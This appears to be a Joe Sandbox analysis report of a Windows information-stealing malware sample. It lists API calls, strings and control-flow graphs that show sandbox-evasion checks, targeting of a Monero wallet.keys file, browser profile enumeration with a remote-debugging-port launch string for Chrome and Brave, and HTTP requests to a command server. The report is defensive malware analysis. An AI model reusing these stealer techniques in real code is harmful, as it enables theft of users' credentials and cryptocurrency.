                                        • Part of subcall function 00D4ACC0: lstrlen.KERNEL32(?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D4ACD5
                                        • Part of subcall function 00D4ACC0: lstrcpy.KERNEL32(00000000), ref: 00D4AD14
                                        • Part of subcall function 00D4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AD22
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                        • Part of subcall function 00D4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00D4AC82
                                        • Part of subcall function 00D4AC30: lstrcat.KERNEL32(00000000), ref: 00D4AC92
                                      • InternetCloseHandle.WININET(00000000), ref: 00D34F1F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                      • String ID: "$"$------$------$------
                                      • API String ID: 460715078-2180234286
                                      • Opcode ID: d14a4acc3a4ec6a6dbae91569ec76176c24afff4a59980951be26a87b229b408
                                      • Instruction ID: 37040e70d675297e715b5e24e6959cdd4e790347a8ecd1a4c6968e3f4886732a
                                      • Opcode Fuzzy Hash: d14a4acc3a4ec6a6dbae91569ec76176c24afff4a59980951be26a87b229b408
                                      • Instruction Fuzzy Hash: F612F872950528ABEB15EB98DDA2FEEB379EF14300F104199B10662491EF746F48CF72
                                      Control-flow Graph
                                      control_flow_graph 1090 d45760-d457c7 call d45d20 call d4ab30 * 3 call d4aa50 * 4 1106 d457cc-d457d3 1090->1106 1107 d457d5-d45806 call d4ab30 call d4aab0 call d31590 call d45440 1106->1107 1108 d45827-d4589c call d4aa50 * 2 call d31590 call d45510 call d4abb0 call d4ab10 call d4ade0 StrCmpCA 1106->1108 1123 d4580b-d45822 call d4abb0 call d4ab10 1107->1123 1134 d458e3-d458f9 call d4ade0 StrCmpCA 1108->1134 1138 d4589e-d458de call d4aab0 call d31590 call d45440 call d4abb0 call d4ab10 1108->1138 1123->1134 1139 d45a2c-d45a94 call d4abb0 call d4ab30 * 2 call d316b0 call d4ab10 * 4 call d31670 call d31550 1134->1139 1140 d458ff-d45906 1134->1140 1138->1134 1269 d45d13-d45d16 1139->1269 1142 d4590c-d45913 1140->1142 1143 d45a2a-d45aaf call d4ade0 StrCmpCA 1140->1143 1146 d45915-d45969 call d4ab30 call d4aab0 call d31590 call d45440 call d4abb0 call d4ab10 1142->1146 1147 d4596e-d459e3 call d4aa50 * 2 call d31590 call d45510 call d4abb0 call d4ab10 call d4ade0 StrCmpCA 1142->1147 1162 d45ab5-d45abc 1143->1162 1163 d45be1-d45c49 call d4abb0 call d4ab30 * 2 call d316b0 call d4ab10 * 4 call d31670 call d31550 1143->1163 1146->1143 1147->1143 1245 d459e5-d45a25 call d4aab0 call d31590 call d45440 call d4abb0 call d4ab10 1147->1245 1168 d45ac2-d45ac9 1162->1168 1169 d45bdf-d45c64 call d4ade0 StrCmpCA 1162->1169 1163->1269 1175 d45b23-d45b98 call d4aa50 * 2 call d31590 call d45510 call d4abb0 call d4ab10 call d4ade0 StrCmpCA 1168->1175 1176 d45acb-d45b1e call d4ab30 call d4aab0 call d31590 call d45440 call d4abb0 call d4ab10 1168->1176 1198 d45c66-d45c71 Sleep 1169->1198 1199 d45c78-d45ce1 call d4abb0 call d4ab30 * 2 call d316b0 call d4ab10 * 4 call d31670 call d31550 1169->1199 1175->1169 1274 d45b9a-d45bda call d4aab0 call d31590 call d45440 call d4abb0 call d4ab10 1175->1274 1176->1169 1198->1106 1199->1269 1245->1143 1274->1169
                                      APIs
                                        • Part of subcall function 00D4AB30: lstrlen.KERNEL32(00D34F55,?,?,00D34F55,00D50DDF), ref: 00D4AB3B
                                        • Part of subcall function 00D4AB30: lstrcpy.KERNEL32(00D50DDF,00000000), ref: 00D4AB95
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00D45894
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D458F1
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00D459DB
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00D45B90
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D45AA7
                                        • Part of subcall function 00D4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00D4AAF6
                                        • Part of subcall function 00D45440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D45478
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                        • Part of subcall function 00D45510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00D45568
                                        • Part of subcall function 00D45510: lstrlen.KERNEL32(00000000), ref: 00D4557F
                                        • Part of subcall function 00D45510: StrStrA.SHLWAPI(00000000,00000000), ref: 00D455B4
                                        • Part of subcall function 00D45510: lstrlen.KERNEL32(00000000), ref: 00D455D3
                                        • Part of subcall function 00D45510: lstrlen.KERNEL32(00000000), ref: 00D455FE
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D45C5C
                                      • Sleep.KERNEL32(0000EA60), ref: 00D45C6B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      • Associated: 00000000.00000002.1762225384.0000000000D30000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000D5C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E6D000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E79000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762237620.0000000001006000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.000000000101A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000011A6000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.0000000001281000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012A3000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012AE000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1762622235.00000000012BC000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765492975.00000000012BD000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765610094.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1765625771.000000000145A000.00000080.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpylstrlen$Sleep
                                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                      • API String ID: 507064821-2791005934
                                      • Opcode ID: 9ca2e40a5648a211bead5dc471aa08ce62c3c0269046a5880313fc69f6342db4
                                      • Instruction ID: 07cdedf19e435854068542f0d9a5ae8ebd9d0fca5c4eb93a9863fb5756441d00
                                      • Opcode Fuzzy Hash: 9ca2e40a5648a211bead5dc471aa08ce62c3c0269046a5880313fc69f6342db4
                                      • Instruction Fuzzy Hash: 6FE14E729505049BDB14FBA4E9A3AFE733DEF54300F408568B54666086EF35AA0CCBB2

                                      Control-flow Graph

                                      • Rendered control-flow graph (executed / not-executed blocks) of basic blocks d419f0-d41c1d not reproduced; API calls in the graph: StrCmpCA, ExitProcess
                                      APIs
                                      • StrCmpCA.SHLWAPI(00000000,block), ref: 00D41A15
                                      • ExitProcess.KERNEL32 ref: 00D41A21
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExitProcess
                                      • String ID: block
                                      • API String ID: 621844428-2199623458
                                      • Opcode ID: bbbc54510bb0d8e7b7b2689cd6d7a328276e49bf5203c78d62621241d082b14e
                                      • Instruction ID: d3a150d57f01dce378ea7bd96f82ef1d91b617ae31aa13824e18bb1d5e8b3647
                                      • Opcode Fuzzy Hash: bbbc54510bb0d8e7b7b2689cd6d7a328276e49bf5203c78d62621241d082b14e
                                      • Instruction Fuzzy Hash: 10515A78B04209EFDB14DFA4D955AAE7BB9FF44704F104049F842AB240E779E985CB72

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00D49BB0: GetProcAddress.KERNEL32(74DD0000,01672218), ref: 00D49BF1
                                        • Part of subcall function 00D49BB0: GetProcAddress.KERNEL32(74DD0000,01672368), ref: 00D49C0A
                                        • Part of subcall function 00D49BB0: GetProcAddress.KERNEL32(74DD0000,016723F8), ref: 00D49C22
                                        • Part of subcall function 00D49BB0: GetProcAddress.KERNEL32(74DD0000,016723C8), ref: 00D49C3A
                                        • Part of subcall function 00D49BB0: GetProcAddress.KERNEL32(74DD0000,016723E0), ref: 00D49C53
                                        • Part of subcall function 00D49BB0: GetProcAddress.KERNEL32(74DD0000,016791C8), ref: 00D49C6B
                                        • Part of subcall function 00D49BB0: GetProcAddress.KERNEL32(74DD0000,01665890), ref: 00D49C83
                                        • Part of subcall function 00D49BB0: GetProcAddress.KERNEL32(74DD0000,01665790), ref: 00D49C9C
                                        • Part of subcall function 00D49BB0: GetProcAddress.KERNEL32(74DD0000,016722D8), ref: 00D49CB4
                                        • Part of subcall function 00D49BB0: GetProcAddress.KERNEL32(74DD0000,01672440), ref: 00D49CCC
                                        • Part of subcall function 00D49BB0: GetProcAddress.KERNEL32(74DD0000,01672470), ref: 00D49CE5
                                        • Part of subcall function 00D49BB0: GetProcAddress.KERNEL32(74DD0000,01672338), ref: 00D49CFD
                                        • Part of subcall function 00D49BB0: GetProcAddress.KERNEL32(74DD0000,016656B0), ref: 00D49D15
                                        • Part of subcall function 00D49BB0: GetProcAddress.KERNEL32(74DD0000,01672230), ref: 00D49D2E
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                        • Part of subcall function 00D311D0: ExitProcess.KERNEL32 ref: 00D31211
                                        • Part of subcall function 00D31160: GetSystemInfo.KERNEL32(?), ref: 00D3116A
                                        • Part of subcall function 00D31160: ExitProcess.KERNEL32 ref: 00D3117E
                                        • Part of subcall function 00D31110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00D3112B
                                        • Part of subcall function 00D31110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00D31132
                                        • Part of subcall function 00D31110: ExitProcess.KERNEL32 ref: 00D31143
                                        • Part of subcall function 00D31220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00D3123E
                                        • Part of subcall function 00D31220: __aulldiv.LIBCMT ref: 00D31258
                                        • Part of subcall function 00D31220: __aulldiv.LIBCMT ref: 00D31266
                                        • Part of subcall function 00D31220: ExitProcess.KERNEL32 ref: 00D31294
                                        • Part of subcall function 00D46A10: GetUserDefaultLangID.KERNEL32 ref: 00D46A14
                                        • Part of subcall function 00D31190: ExitProcess.KERNEL32 ref: 00D311C6
                                        • Part of subcall function 00D479E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00D311B7), ref: 00D47A10
                                        • Part of subcall function 00D479E0: RtlAllocateHeap.NTDLL(00000000), ref: 00D47A17
                                        • Part of subcall function 00D479E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00D47A2F
                                        • Part of subcall function 00D47A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D47AA0
                                        • Part of subcall function 00D47A70: RtlAllocateHeap.NTDLL(00000000), ref: 00D47AA7
                                        • Part of subcall function 00D47A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00D47ABF
                                        • Part of subcall function 00D4ACC0: lstrlen.KERNEL32(?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D4ACD5
                                        • Part of subcall function 00D4ACC0: lstrcpy.KERNEL32(00000000), ref: 00D4AD14
                                        • Part of subcall function 00D4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AD22
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01679248,?,00D510F4,?,00000000,?,00D510F8,?,00000000,00D50AF3), ref: 00D46D6A
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D46D88
                                      • CloseHandle.KERNEL32(00000000), ref: 00D46D99
                                      • Sleep.KERNEL32(00001770), ref: 00D46DA4
                                      • CloseHandle.KERNEL32(?,00000000,?,01679248,?,00D510F4,?,00000000,?,00D510F8,?,00000000,00D50AF3), ref: 00D46DBA
                                      • ExitProcess.KERNEL32 ref: 00D46DC2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                      • String ID:
                                      • API String ID: 2525456742-0
                                      • Opcode ID: 0a4407246a629936086d0615573b28459b641eaec91bf0edfa6034fb03ad9ec6
                                      • Instruction ID: 772c7f8b0480551dd93ab82658df9c931435ffd87c198b91d05edc0cd8a37d47
                                      • Opcode Fuzzy Hash: 0a4407246a629936086d0615573b28459b641eaec91bf0edfa6034fb03ad9ec6
                                      • Instruction Fuzzy Hash: B6310875A40208ABEB14FBF4D867BFE7779EF44340F100918F552A6186DF74AA058B72

                                      Control-flow Graph

                                      • Rendered control-flow graph (executed / not-executed blocks) of basic blocks d31220-d3129d not reproduced; API calls in the graph: GlobalMemoryStatusEx, ExitProcess
                                      APIs
                                      • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00D3123E
                                      • __aulldiv.LIBCMT ref: 00D31258
                                      • __aulldiv.LIBCMT ref: 00D31266
                                      • ExitProcess.KERNEL32 ref: 00D31294
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                      • String ID: @
                                      • API String ID: 3404098578-2766056989
                                      • Opcode ID: c1661ed60bc669478ebedc685ee1d2c44aca5ae46678e4ed5a1d1947ee1b4bf9
                                      • Instruction ID: a2e54ea99520475161e163802f534c105a0ff3ddee61397c02ed2664d33bc9df
                                      • Opcode Fuzzy Hash: c1661ed60bc669478ebedc685ee1d2c44aca5ae46678e4ed5a1d1947ee1b4bf9
                                      • Instruction Fuzzy Hash: DB011DB4D40309BBEB10EFE4CC4ABAEBBB8EB14705F248458E604B61C1D77855458779

                                      Control-flow Graph

                                      • Rendered control-flow graph (executed / not-executed blocks) of basic blocks d46d5a-d46dc2 not reproduced; API calls in the graph: OpenEventA, CreateEventA, CloseHandle, Sleep, ExitProcess
                                      APIs
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01679248,?,00D510F4,?,00000000,?,00D510F8,?,00000000,00D50AF3), ref: 00D46D6A
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D46D88
                                      • CloseHandle.KERNEL32(00000000), ref: 00D46D99
                                      • Sleep.KERNEL32(00001770), ref: 00D46DA4
                                      • CloseHandle.KERNEL32(?,00000000,?,01679248,?,00D510F4,?,00000000,?,00D510F8,?,00000000,00D50AF3), ref: 00D46DBA
                                      • ExitProcess.KERNEL32 ref: 00D46DC2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                      • String ID:
                                      • API String ID: 941982115-0
                                      • Opcode ID: 47c99f8e5346807c479be4750678243514e614ca5a29a4a8726479346c8f31a4
                                      • Instruction ID: 822b41eaf66d6d17ff83b8a9ab7b586b08a6b6c680c013980cb21f163688b5d1
                                      • Opcode Fuzzy Hash: 47c99f8e5346807c479be4750678243514e614ca5a29a4a8726479346c8f31a4
                                      • Instruction Fuzzy Hash: 65F05E70E44209ABEB11ABA0DC0ABBE3774EF05701F140515B593A51C5DBB9A900CB72

                                      Control-flow Graph

                                      APIs
                                      • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00D34889
                                      • InternetCrackUrlA.WININET(00000000,00000000), ref: 00D34899
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CrackInternetlstrlen
                                      • String ID: <
                                      • API String ID: 1274457161-4251816714
                                      • Opcode ID: d2c0ffd98304f1cb4e3ec6ac90b8b77c791c7937d927e5f3674abdd18d9618b7
                                      • Instruction ID: 1722fe8a8adae25f81e26fabbaac0509884adc3bf0ce5f33bcb9bdb0b3878928
                                      • Opcode Fuzzy Hash: d2c0ffd98304f1cb4e3ec6ac90b8b77c791c7937d927e5f3674abdd18d9618b7
                                      • Instruction Fuzzy Hash: C2214F71D40208ABDF14DFA4E845ADE7B79FB44321F108625F955A72C0EB746A05CFA2

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00D4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00D4AAF6
                                        • Part of subcall function 00D362D0: InternetOpenA.WININET(00D50DFF,00000001,00000000,00000000,00000000), ref: 00D36331
                                        • Part of subcall function 00D362D0: StrCmpCA.SHLWAPI(?,0167E7D8), ref: 00D36353
                                        • Part of subcall function 00D362D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D36385
                                        • Part of subcall function 00D362D0: HttpOpenRequestA.WININET(00000000,GET,?,0167E3F8,00000000,00000000,00400100,00000000), ref: 00D363D5
                                        • Part of subcall function 00D362D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00D3640F
                                        • Part of subcall function 00D362D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D36421
                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D45478
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                      • String ID: ERROR$ERROR
                                      • API String ID: 3287882509-2579291623
                                      • Opcode ID: fcc1b2b419e85911272436255df7ab2f60ed5ae3ab13f58868f26f9a55b2635e
                                      • Instruction ID: f3d1c667c41afdf9c4ae9d9276e1794678a31e93579987dca39d338653e5759f
                                      • Opcode Fuzzy Hash: fcc1b2b419e85911272436255df7ab2f60ed5ae3ab13f58868f26f9a55b2635e
                                      • Instruction Fuzzy Hash: 01111230940508ABDB14FFA8DD92AED7339EF50340F404658F91A5B492EF30AB08CB71
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D47AA0
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00D47AA7
                                      • GetComputerNameA.KERNEL32(?,00000104), ref: 00D47ABF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateComputerNameProcess
                                      • String ID:
                                      • API String ID: 1664310425-0
                                      • Opcode ID: 301b1980a050f14b4cfc8972d175eabe983fee93b5b3ae88a6f40349456d4e5d
                                      • Instruction ID: 4de7f6ef11ef7bd374a72a28c80522fb77e3968255856e0db64e9163c3e7628c
                                      • Opcode Fuzzy Hash: 301b1980a050f14b4cfc8972d175eabe983fee93b5b3ae88a6f40349456d4e5d
                                      • Instruction Fuzzy Hash: F20186B1A04349ABC710DF98D945BAEBBB8F704715F100119F585E2280D7795A0487B1
                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00D3112B
                                      • VirtualAllocExNuma.KERNEL32(00000000), ref: 00D31132
                                      • ExitProcess.KERNEL32 ref: 00D31143
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$AllocCurrentExitNumaVirtual
                                      • String ID:
                                      • API String ID: 1103761159-0
                                      • Opcode ID: be4852281d7c3003225915b2ac0cefc4d1de9f713e0301867c65f78a7b407102
                                      • Instruction ID: 0a93bf99dba82c7ca2d0c8bd6789fa367dbe1390d181f1bcc8d2d798486bc2f9
                                      • Opcode Fuzzy Hash: be4852281d7c3003225915b2ac0cefc4d1de9f713e0301867c65f78a7b407102
                                      • Instruction Fuzzy Hash: F9E0CD7094530CFBE7216B90DD0EB4C767CDB04B01F100054F748761C4C6BD35404769
                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00D310B3
                                      • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00D310F7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Virtual$AllocFree
                                      • String ID:
                                      • API String ID: 2087232378-0
                                      • Opcode ID: 76986d453bfd94cb515f6be31f8823838071fbfa39244ba536bd6d9534c06ac4
                                      • Instruction ID: 3f001d9f633b99241858029cbfba2903538c45ce277a9dd0ac368220ef18f3f9
                                      • Opcode Fuzzy Hash: 76986d453bfd94cb515f6be31f8823838071fbfa39244ba536bd6d9534c06ac4
                                      • Instruction Fuzzy Hash: E1F082B5641218BBE7289AA8AC59FAEB7A8E705B45F300448F544E7280D576AF00DBB4
                                      APIs
                                        • Part of subcall function 00D47A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D47AA0
                                        • Part of subcall function 00D47A70: RtlAllocateHeap.NTDLL(00000000), ref: 00D47AA7
                                        • Part of subcall function 00D47A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00D47ABF
                                        • Part of subcall function 00D479E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00D311B7), ref: 00D47A10
                                        • Part of subcall function 00D479E0: RtlAllocateHeap.NTDLL(00000000), ref: 00D47A17
                                        • Part of subcall function 00D479E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00D47A2F
                                      • ExitProcess.KERNEL32 ref: 00D311C6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$Process$AllocateName$ComputerExitUser
                                      • String ID:
                                      • API String ID: 3550813701-0
                                      • Opcode ID: 671e1f7e396a739cefc6a2a7042f0f272e50be510b7ba14b7d1cfe75eab74b2e
                                      • Instruction ID: fb5ff727031fdba267a81cab18294a025478a49782c74295c9ac5851dd71107f
                                      • Opcode Fuzzy Hash: 671e1f7e396a739cefc6a2a7042f0f272e50be510b7ba14b7d1cfe75eab74b2e
                                      • Instruction Fuzzy Hash: E0E017B9904302A7DA20B3B4AC07B6F328CDB1474EF040828FA4882146EE2AF9108A75
                                      APIs
                                        • Part of subcall function 00D4AA50: lstrcpy.KERNEL32(00D50E1A,00000000), ref: 00D4AA98
                                        • Part of subcall function 00D4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00D4AC82
                                        • Part of subcall function 00D4AC30: lstrcat.KERNEL32(00000000), ref: 00D4AC92
                                        • Part of subcall function 00D4ACC0: lstrlen.KERNEL32(?,01678F98,?,\Monero\wallet.keys,00D50E1A), ref: 00D4ACD5
                                        • Part of subcall function 00D4ACC0: lstrcpy.KERNEL32(00000000), ref: 00D4AD14
                                        • Part of subcall function 00D4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AD22
                                        • Part of subcall function 00D4ABB0: lstrcpy.KERNEL32(?,00D50E1A), ref: 00D4AC15
                                      • FindFirstFileA.KERNEL32(00000000,?,00D50B32,00D50B2F,00000000,?,?,?,00D51450,00D50B2E), ref: 00D3BEC5
                                      • StrCmpCA.SHLWAPI(?,00D51454), ref: 00D3BF33
                                      • StrCmpCA.SHLWAPI(?,00D51458), ref: 00D3BF49
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00D3C8A9
                                      • FindClose.KERNEL32(000000FF), ref: 00D3C8BB
                                      Strings
                                      • --remote-debugging-port=9229 --profile-directory=", xrefs: 00D3C3B2
                                      • Brave, xrefs: 00D3C0E8
                                      • Google Chrome, xrefs: 00D3C6F8
                                      • Preferences, xrefs: 00D3C104
                                      • --remote-debugging-port=9229 --profile-directory=", xrefs: 00D3C495
                                      • --remote-debugging-port=9229 --profile-directory=", xrefs: 00D3C534
                                      • \Brave\Preferences, xrefs: 00D3C1C1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1762237620.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                      • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                      • API String ID: 3334442632-1869280968
                                      • Opcode ID: e7dbe7100b4d8d9a6b2c5fbf5b41711ebbbeffcd5a73dbfe7edee0bffa59a7bb
                                      • Instruction ID: 17629494534076c2418b52221f9dae2f55026ca28a9e90244a025af9542c90aa
                                      • Opcode Fuzzy Hash: e7dbe7100b4d8d9a6b2c5fbf5b41711ebbbeffcd5a73dbfe7edee0bffa59a7bb
                                      • Instruction Fuzzy Hash: 30524F729501189BDB24FB64DD96EEE733DEF54300F404599B94AA6081EF34AB48CFB2
                                      APIs
